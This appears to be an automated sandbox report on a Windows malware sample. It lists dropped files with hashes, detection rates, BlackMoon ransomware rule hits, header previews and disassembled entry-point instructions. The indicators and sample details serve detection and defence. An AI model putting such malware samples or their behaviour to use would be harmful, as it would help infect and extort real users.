                                                                                MD5:EE1881FCFC62AD6E1D1C3ADF6971B84E
                                                                                SHA1:3CA488F9FFA71BBBF5C0CF1D369162A11FB352FD
                                                                                SHA-256:435834B8583AD89AB203295DFC437496D7CE7848A67F03820AD8E5D7B284750C
                                                                                SHA-512:881B80F3B107DD41FABFC1280D435C8850023D3EB061D3706BEE561330043148C5657DE6FDBBB46D9A4EF7EDEB0B9010455BBB93F12532E791EFAC3C6ED7BC8D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 75%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n./1*.Ab*.Ab*.Abs.Rb(.Ab.1:b(.Ab...b/.Ab#..b#.Ab#..b5.Ab*.@b..Ab4..b..Ab4..b..Ab4..b..Ab4..bk.Ab4..b+.Ab4..b+.Ab4..b+.AbRich*.Ab........................PE..L....U.a...........!.....Z...(......d;.......p...............................0............@.........................$...4......|........7..............................................................@............ .......x..@....................text....Y.......................... ..`.rdata..4+...p......................@..@.data...............................@....vvvt0..G5...@...................... ..`.vvvt1..PS.......T..................`....reloc...............X..............@..@.rsrc....7...........Z..............@..@................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):4168704
                                                                                Entropy (8bit):6.662551577800254
                                                                                Encrypted:false
                                                                                SSDEEP:98304:vC6WYX0/PiWStTx3aExVDSQf68gVvqpDDT328pRkYR/VjZSWaQ7I952isR2JnMjh:vC6W0cCqE16kNpR/VjZSc7JQJMIi
                                                                                MD5:0F5671FDBDB415CCCF68E146993618E9
                                                                                SHA1:B042D42F31DCAC642CBB62FE97F72D5916B2F781
                                                                                SHA-256:AB33E83DD63FD59B706B1D0221109EEA243880D46F19B97C27A0D74424A55C91
                                                                                SHA-512:C6522F4ECF863D1B513EB37A41A475D36B08F46DFDED308B042E97FC20FE1492938EE5783D9EF618B31C52E5C4FC8729821B884B6557B3C869B6AC94C116DA80
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........[ep.[ep.[ep..Fc.Yep..+.Sep.4...ep.4...ep.R..]ep.[eq.3dp.R..Nep.4..Mdp.[ep.Zep.4...dp.4..Zep.Rich[ep.................PE..L...cG.b...........!....../..T.......,......./...............................@...........@...................................5..............................P=.0...0./.............................@.3.@............./.D............................text..../......./................. ..`.rdata...J..../..L..../.............@..@.data...h.....6.......5.............@....vmp0....N....=..P....<.............`..`.reloc..0....P=.......<.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):163
                                                                                Entropy (8bit):5.563825416071981
                                                                                Encrypted:false
                                                                                SSDEEP:3:okCW4DVr69zlREDfw33/eU8XCu1X6WUZy+wj3LiVrQXnwU8JqvRSa2kxy:uW4DV4lH3QX1NUo+Wn/0R+y
                                                                                MD5:A04E3BAF4BC56122489A833A15A5C0AD
                                                                                SHA1:EAE1B49156256228B84AB591D6F19048AFE12CF2
                                                                                SHA-256:BD2A26938A4F2E6F35406ADFC6AA6D57EE28C82C0C5EBA033C548EC6F5FD3C90
                                                                                SHA-512:2E198A2C6F0B8BA9322D2594071704374FE5F1E0A6990C2D642DEC0341A86EEDF91CAD025ADC6C3E16FFD89ACED0C3B8BA44FC8DF697E9B0ECCF68ECD9B089C2
                                                                                Malicious:false
                                                                                Preview:[ConnectLogs]..uplog=2024-12-5 8:25:8 14C1rcP2bB1EUsp2KvE2|wfsUMOf7GdVs|qYr|YqR5E24ODbUss1|sP2Ka|Gadg2UcO|srGbr_9nGpHbrD2h7Bv24d6P|8hGih1H3wqY1uOJ4wPEKUdViSIP7BT..
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1026048
                                                                                Entropy (8bit):7.925003138253117
                                                                                Encrypted:false
                                                                                SSDEEP:24576:CV9FhL2ViPIyzF6bcMNhpXtvYNccdmeDqpAmmRUawOYgbTx:Chh4m9zZMNhvvDEbGpcEOYgbd
                                                                                MD5:0D46751EEFD7215B577C1778AA0AA518
                                                                                SHA1:DA3D20A35305DE03264A7A1A9EE9F2C53062D571
                                                                                SHA-256:78F5AB4C979A9E821DAA8C69D5190CF5B390FEF50E71B07DF837E02D7F193472
                                                                                SHA-512:3F815EDE6EDD057D66D972D7A8CFBF5144893167ED7E6FF469E6E33EF0F6D007B7F8C68541C9A68E87B8549A6C87C678C00D9AA97C8544447C9FEB2D7526E1FF
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 67%
                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d... ......;q............@..........................0".........................................e...PP........!.tW....................!.x....................................................k..|...........................CODE....4c.......................... ..`DATA.....+..........................@...BSS......_...............................idata..($..........................@....edata..e....@......................@..P.vmp0........P......................`..`.vmp1...j....0......................`....reloc..x.....!.....................@..P.rsrc...tW....!.....................@..P........................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):697344
                                                                                Entropy (8bit):7.987740216318556
                                                                                Encrypted:false
                                                                                SSDEEP:12288:ZJOpSSP/ct8PFEWQ6dLBOCRf747xLwV3bgJx6I2jnkP:MJPkEi9g47xsV32n2L
                                                                                MD5:635EA65C178C0AF1337A0D9BA23B9880
                                                                                SHA1:F0A9C2D5F8BCCDA8199FF48CD00DDD1F44D9C8A9
                                                                                SHA-256:382D06362E60A6FC7E4E7BF02C43B3B9243F74FB2463C62D9AC386E4E26F25A1
                                                                                SHA-512:F19D2DD5A824D042C469A09FA04D8D94722CAE97E2E3B7FC6F15D86333E49BB1C57B6B2246F26E753C22BCCBEF28BCE6E5C14D9471170A2193F7DB5955E1C9BE
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 7%
                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....!xY............................. ...........@..........................P ............................................../ ......P......................T/ ......................................................................................text....p..........................@....itext... ..........................@....data............:..................@....bss.....`...0......................@....idata...@..........................@....didata.............................@....edata..............................@....reloc...`.......(... ..............@....rsrc........P...F...H..............@....aspack.. ... .....................@....adata.......@ .....................@...........................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1914368
                                                                                Entropy (8bit):7.362472653883485
                                                                                Encrypted:false
                                                                                SSDEEP:49152:kBhv/6L3407dsKlKdyZIdcn+hsEm+x/cPpv9e1x:kBhv/6L34abEygw0sEm+x/q9e1x
                                                                                MD5:C812E874308B0D17CCF926BB9C95357B
                                                                                SHA1:4C559B48EA152B77980A37595F48A45773C475FB
                                                                                SHA-256:3CA39BB8BDD6BA2C8945AD2940D9CC015F0599141A2879FE6319F8EA1D920A40
                                                                                SHA-512:10D8184D7FB0AEF004BAAE62FCB578F892A54400E69F34D3A590A16F8A55AC74713E6604E1E77F34324E38CB7CDE5D0E37DB9255087CF8343AD76378FD1E605A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 35%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ej.^............X(.......E......n}..!...n}%.U....s..........w....s......n}$.....n}!.(...n}......n}......Rich............................PE..L...@s.a.....................:......]'............@......................................@..................................Y..T........'.......................... ...............................h...@...............t............................text.............................. ..`.rdata..4...........................@..@.data....i...P...(...4..............@....vmp0....>.......@...\..............`....vmp1...d...........................`....reloc..............................@..@.rsrc....'.......(..................@..@................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1000448
                                                                                Entropy (8bit):7.9409094811899585
                                                                                Encrypted:false
                                                                                SSDEEP:24576:SM6k83srWbVyeQiMHi9PF00kmBDbH226JMVC:BN83sibUlpe0YBDqbJs
                                                                                MD5:E152321EF090F20A1D89D55B934A6B33
                                                                                SHA1:5ACE6F7EE05C65F024164168BFB9A0B4768E7D28
                                                                                SHA-256:92194C77114E6D4066EC1788485C2AF7E58C06E5906775F23CB22BABA33E1277
                                                                                SHA-512:A673E84D677D1B86B40A32FA5D67D9DE2575D0FEB4021159C11E3F003EC313D7C420213CCC2EF7833402077FF8C831147DF907B19C4F25E87EF4869CB7E93E56
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+RFeE.FeE.FeE..+..EeE.)....eE.)... eE.)....eE.O...OeE.FeD..eE.FeE.GeE.)....eE.)...GeE.RichFeE.........................PE..L......a...........!.........&............................................... '...........@...................................................................'.......'.............................p.'.@............`#.D............................text.............................. ..`.rdata...?..........................@..@.data...<2..........................@....vmp0....~...P......................`....vmp1....<.......>..................`....reloc........'......B..............@..B........................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):278528
                                                                                Entropy (8bit):6.462799085037293
                                                                                Encrypted:false
                                                                                SSDEEP:6144:qy8Rmc6sJdYFZY4yRc7979wypicS7UItAvl:clsYfu79pwypi949
                                                                                MD5:11D29986E22E3033FAD22362D5BB9B9E
                                                                                SHA1:2CE91BCAE7EA963FFDA9A797D4405AB87F2C77CD
                                                                                SHA-256:0D518D5120378DE44E8157A8F83F8AAF5BEB71A45BBF73C913F71E4BC9DCCEEB
                                                                                SHA-512:70D6C30DCB3F52E45F2C5E4859BD1238CB17DB56616E8A6A75942C92300365DE271D9FDE54F14822E0287D8A547E4523B42BB2F648491EB9C83ACFA2F734AAE8
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e....................3........3......3..........%.......3....3....3....3....Rich............PE..L...!r.T...........!.........H...............0............................................@.........................P................0..0....................P...,..................................py..@............0...............................text............................... ..`.rdata.......0......................@..@.data....E.......$..................@....rsrc...0....0......................@..@.reloc..NB...P...D..................@..B................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):5095424
                                                                                Entropy (8bit):6.573640794066719
                                                                                Encrypted:false
                                                                                SSDEEP:98304:8/Gq9tQ0I2sfjn+1LOfPR6F2+5bT7j5R31:e9t9I2vLOfPot
                                                                                MD5:AAA5DC054C587BCB8101660A9C08F0EC
                                                                                SHA1:1AAEA461D0B7DF8287B9269F945573F7BBD773A5
                                                                                SHA-256:3E0E15C5C5D2B5868B768E1AB71EAE9A2900B2341CF589272D571A0E3817A4E2
                                                                                SHA-512:FF02058DDE5A09E2DCE1FA9B5E8EBEC29809ACABA29A1D87623CAA40713C95B9AEE2A73F97632152F4D80FA270E5DE30BCA8A263A31A762B0339795139AAE964
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, Author: Joe Security
                                                                                • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2-x.vL..vL..vL...S..tL...P..wL..CI.qL...P..XL..@j..L..S..pL../o..tL..CK.UL..vL..N..@j..L..vL..wL..S..xL..J..wL..S..wL..RichvL..................PE..L...eb.]...........!.....0?..........O<......@?..............................0P......................................*@.M...8.?.|.... P......................@N.|....................................................@?..............................text...J'?......0?................. ..`.rdata..]....@?......@?.............@..@.data........0@......0@.............@....vmp0........ K.. ....H.............`..`.reloc..|....@N.......K.............@..@.rsrc........ P.......M.............@...........................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):13312
                                                                                Entropy (8bit):5.397635444561731
                                                                                Encrypted:false
                                                                                SSDEEP:192:/o5r2+6acxUj33TwlsXsDonjrWgncCMxOR3XkEqbp9K6ydDrjf9:A5Otx8HTweXssvWtxOt0L71yRrZ
                                                                                MD5:6D4F24374636A1D2B18D23508E94A5AF
                                                                                SHA1:6056E57026F5106BE7448650A711088F7F26B81B
                                                                                SHA-256:1001BED009D07EFADF0A1784CB07E79A362EAA4CDE62C43E8EC226B210E1388E
                                                                                SHA-512:3013651D862D731746A238AB729023506E65C7A8DE2E9967482B7356923296581C7F004B604D560DECB0B5FD32FAB3087DF7C4528C3EE1C6BC75C4E3A7D621FD
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n..T...T...T...s..P....@..U...J]..U...J]..Z...J]..]...J]..Q...T...>...J]..V...J]..U...J]..U...J]..U...RichT...........................PE..L....8.\...........!................"........0...............................p............@......................... =..5...<8..P....P..,....................`..t....1...............................3..@............0...............................text............................... ..`.rdata..U....0......................@..@.data........@.......$..............@....rsrc...,....P.......&..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2482176
                                                                                Entropy (8bit):7.655801729535385
                                                                                Encrypted:false
                                                                                SSDEEP:49152:vdt5TgZvBnBS7YWtu4uEiWaitbURcdltQ+LPfzgPKJdqL0B2eYL7YuPqpu0RKnX7:X5TgZvBnBS7YWtu4uEiWaitbURcdltQZ
                                                                                MD5:ED77B38E6DEACCC15EE7A3CDE313BF37
                                                                                SHA1:F9D6E7CA545790F385F35069230C153E38D84FF1
                                                                                SHA-256:2A7469FE77A4659592FE7E2C36D32343B3C8E728BB52EAEDA0CAE03BC74EAAB5
                                                                                SHA-512:594CA225AF6AB65688A2D891198B34D426B55F7B6CF55D366408D42DCC97B0E3A682D033F382CCE165D5DDE18381B88040F73BDC3D0C314E0C4D12AE32A09601
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, Author: Joe Security
                                                                                • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8...8...8...W...1...W...>...C...;.......0.............:..............:...........8.............8...9.......".......9...Rich8...........PE..L....o]...........!.........P......a..............E..........................(......................................A..K....$..,.............................(.D[......................................................T............................text...^........................... ..`.rdata..Ka.......p..................@..@.data........P.......P..............@....vmp0...13...P...@...@..............`..`.reloc..D[....(..`....%.............@..B........................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):200704
                                                                                Entropy (8bit):7.840036180451055
                                                                                Encrypted:false
                                                                                SSDEEP:3072:DtWru7tGhV0AD1Lciipl4gseTwdDV5PEv4gtJDxbs29mHzsKl5eUMfSrxrO:0ru7tGcJLqgseTMV9ivFsZ2XSM
                                                                                MD5:A366501F2CE6ABA81384C2688AF599C1
                                                                                SHA1:2A3A109CCFFCE9F1245B328E521120AC2FBFF66B
                                                                                SHA-256:233D8F1CB06995B505F4CECBAFE0DD53635BF820002C512639DD5A0B87827086
                                                                                SHA-512:4FA0E0BB6396ED2D8DB837EE010CD647DE4799AE9C111DB056EB7E0DC02D0D3BE936BDCD8342923DE359415890D9602BA0DEC20ED1111D68BAC5D38C2DDDB142
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):614400
                                                                                Entropy (8bit):7.9216008760747325
                                                                                Encrypted:false
                                                                                SSDEEP:12288:v39HfzCgZ1UpcBLioopeCTKtYF3ECT9IhYWaTy94yVOvV3m3:vtLCcUpQmomea9F3B+XY2Ohm3
                                                                                MD5:1CD5B851B0AC196F36DF69B82DDD475E
                                                                                SHA1:A8831A73E9FB0FE78B110681F13300A56898680A
                                                                                SHA-256:23A842D3EE1B7724999BE5C8676BE999294D63B9BB94492E6BB4C0FB1A0D1402
                                                                                SHA-512:650053FFF05DF29976AF65347A5C9850B52186E0847BA2A7A05E3662E5CD607BDA5CA8B7290FFC56F6B786FE337FD8C48CCA8B953482C0C54AED5C1C041EC690
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 78%
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):21878788
                                                                                Entropy (8bit):7.814225492140437
                                                                                Encrypted:false
                                                                                SSDEEP:393216:+wnLwvEgWtakXdhPLEB5n9GQEFVD/Tsfhs13M9SNGDYhBUSg7dID1bMW:9nLtgWtakXzoBiRFVfuhq3MAGABNgmD1
                                                                                MD5:E5CBF953F666310019C8BA0C1FAB39F9
                                                                                SHA1:324547FD42CFB4C2AC6188F95ADD58844B247AF2
                                                                                SHA-256:63A2CA58A38B2CE43DCA6FE4DC612293AA5C21E1F32E8EBC00316CA35BD8B5F3
                                                                                SHA-512:0FA1A75BF042933AE92E0041B8922D18C53B3CA7DBE06D211B18F2AA5717EAA873236D9D6A49D8EC17C07D2E307874C7BBD00063BCDF69BD70FFC758A242D61D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Process:C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Oct 4 13:16:54 2023, mtime=Thu Dec 5 12:25:03 2024, atime=Thu Dec 5 12:25:00 2024, length=21878788, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):660
                                                                                Entropy (8bit):5.179781727751646
                                                                                Encrypted:false
                                                                                SSDEEP:12:8mBqieE1qzYNbRxKY5sM43Vk83wjEjAgcxZqVk83dFloLF60mV:8mBqizTnDsM43V/0QATxZqV/wF60m
                                                                                MD5:0B2A717BADF6E238D96DCE195D54B763
                                                                                SHA1:CB920B5585CCAD137898B77064E7414CB9A0DD79
                                                                                SHA-256:BFBDD59F8B1523FBAD65BE392928BA95E7ED59E769E7670B19C5BEF18E2A62B5
                                                                                SHA-512:CC6316872CC3796F0A4E93A795FB9831E1060D37F777812DA3C6AB88337361904A206C6D87F8E071D6FB94987FF5B418DF1F0AED0DC65B9E8739BA53305016F8
                                                                                Malicious:false
                                                                                Preview:L..................F.... ...Kn.m.........G...1...G....M..........................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........n....z...G......2...M..Y!k .VIP-#U~1.EXE..f......DW.r.Y!k..............................V.I.P.-.#.U.4.f.1.a.#.U.5.4.5.8.#.U.7.2.4.8...e.x.e.......a...............-.......`..............&.....C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe......\.V.I.P.-.#.U.4.f.1.a.#.U.5.4.5.8.#.U.7.2.4.8...e.x.e...C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.`.......X.......888683...........hT..CrF.f4... .B{2=.b...,...W..hT..CrF.f4... .B{2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):1015208
                                                                                Entropy (8bit):7.855565323381043
                                                                                Encrypted:false
                                                                                SSDEEP:24576:JwtaXBvd9waAo9UfHlbDOkVmE7iTp3EusBBQQnlbi55BhvK:Jwyhd9waAo9eFbDlVmke3EHRanv
                                                                                MD5:386967A0501E0E7DB0A3B52B7722BBE8
                                                                                SHA1:7AFF6DDE81A95994285176AA1DD50A89851B401D
                                                                                SHA-256:D390B07F5BCD247499CCB99B5D874BE74442185CB571DFF47F375836F460B16F
                                                                                SHA-512:79807C178E8D1B67A9A62B29C8E51FEB0548A1B775360F929803210379CC128EB872CF6B4580ABB3FCB299979039693F974FC7359CC8BC900058FF47ADC97300
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 62%
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1015208
                                                                                Entropy (8bit):7.855565323381043
                                                                                Encrypted:false
                                                                                SSDEEP:24576:JwtaXBvd9waAo9UfHlbDOkVmE7iTp3EusBBQQnlbi55BhvK:Jwyhd9waAo9eFbDlVmke3EHRanv
                                                                                MD5:386967A0501E0E7DB0A3B52B7722BBE8
                                                                                SHA1:7AFF6DDE81A95994285176AA1DD50A89851B401D
                                                                                SHA-256:D390B07F5BCD247499CCB99B5D874BE74442185CB571DFF47F375836F460B16F
                                                                                SHA-512:79807C178E8D1B67A9A62B29C8E51FEB0548A1B775360F929803210379CC128EB872CF6B4580ABB3FCB299979039693F974FC7359CC8BC900058FF47ADC97300
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 62%
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.814225458015662
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:VIP-#U4f1a#U5458#U7248.exe
                                                                                File size:21'878'788 bytes
                                                                                MD5:79e8c7fc08846104c300079e8f9cfff2
                                                                                SHA1:b9d9e952375e973d71a077973f6be03f6b9a1987
                                                                                SHA256:0a1dc880d7c52be7311f2870481796bba315774f7c646876f88dc84837f3b4c0
                                                                                SHA512:92f6c950c221ec43bbdf1f22cba95df1b55079c1a24d9623919f565f8ed82adf11eb54f0de8e9ffc718946893faeb5a9836ee9b7cda7df2b0eac854f21c06467
                                                                                SSDEEP:393216:+wnLwvEgWtakXdhPLEB5n9GQEFVD/Tsfhs13M9SNGDYhBUSg7dID1bM+:9nLtgWtakXzoBiRFVfuhq3MAGABNgmDN
                                                                                TLSH:4A2733E82EEC0373E717C13E8178729293189D5B98A9959BD8D8B4FEC0366257635C0F
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a...%..I%..I%..I,.eI$..I..wI!..I,.bI5..I,.rI...I%..I ..I;.tI...I;.eI...I;.bI...I;.uI$..I%.vI$..I;.pI$..IRich%..I........PE..L..
                                                                                Icon Hash:00728a0a4a8ad920
                                                                                Entrypoint:0x2c0e3e8
                                                                                Entrypoint Section:.data31
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6201FC16 [Tue Feb 8 05:13:58 2022 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:76e0e080a1784daaf00fd068f03ca48e
                                                                                Instruction
                                                                                call 00007F04390F5283h
                                                                                and dword ptr [92999044h], ebp
                                                                                shl dword ptr [edi-6Eh], 1
                                                                                push ss
                                                                                push eax
                                                                                das
                                                                                and byte ptr [ebx-0FEC7492h], ch
                                                                                insd
                                                                                xchg eax, esi
                                                                                jnp 00007F04390DEF66h
                                                                                in eax, dx
                                                                                salc
                                                                                jmp 00007F04390DEF98h
                                                                                loop 00007F04390DEFF3h
                                                                                fadd qword ptr [B85F8EE9h]
                                                                                dec esi
                                                                                je 00007F04390DEF4Dh
                                                                                mov al, byte ptr [eax]
                                                                                push 0000001Fh
                                                                                fisubr dword ptr [eax-79h]
                                                                                rcl byte ptr [ebp+30h], 1
                                                                                adc byte ptr [ecx+289A2188h], FFFFFFD5h
                                                                                aam 2Bh
                                                                                hlt
                                                                                push ecx
                                                                                sbb ebx, esi
                                                                                dec ebp
                                                                                int1
                                                                                inc eax
                                                                                mov edx, 8EF79F60h
                                                                                cwde
                                                                                cmpsd
                                                                                sbb al, 19h
                                                                                pop esp
                                                                                out dx, al
                                                                                adc esi, dword ptr [edi-139C0203h]
                                                                                out dx, eax
                                                                                lodsb
                                                                                mov byte ptr [esi], dl
                                                                                jno 00007F04390DEFD2h
                                                                                mov dword ptr [15B35DD6h], eax
                                                                                stosd
                                                                                cmp dh, al
                                                                                sub eax, 1008256Eh
                                                                                outsb
                                                                                sti
                                                                                pop es
                                                                                jo 00007F04390DEFECh
                                                                                xchg eax, ebp
                                                                                xchg eax, esp
                                                                                xor esp, dword ptr [esi+21h]
                                                                                imul dword ptr [edi+ebp*4-1Ch]
                                                                                shl dword ptr [ebx+25D01A46h], 15h
                                                                                sub dl, dl
                                                                                mov esp, E576F7A3h
                                                                                jnp 00007F04390DEFDBh
                                                                                mov ch, 3Ah
                                                                                rcl dword ptr [ecx], 0Bh
                                                                                cmp al, CCh
                                                                                fisttp word ptr [eax]
                                                                                sbb eax, A2EF6414h
                                                                                mov ds, ax
                                                                                mov cl, AAh
                                                                                xchg dword ptr [edx-32h], esi
                                                                                inc ebx
                                                                                sbb byte ptr [edi+2935693Ah], ch
                                                                                xchg eax, ebx
                                                                                pop ds
                                                                                js 00007F04390DEFC9h
                                                                                std
                                                                                jc 00007F04390DEF42h
                                                                                scasd
                                                                                pop edx
                                                                                sar al, 1
                                                                                or dword ptr [edx], ebx
                                                                                das
                                                                                sbb cl, cl
                                                                                dec esi
                                                                                jnc 00007F04390DEFDAh
                                                                                mov ecx, 58B34596h
                                                                                pop edx
                                                                                inc ecx
                                                                                push edi
                                                                                loop 00007F04390DF001h
                                                                                Programming Language:
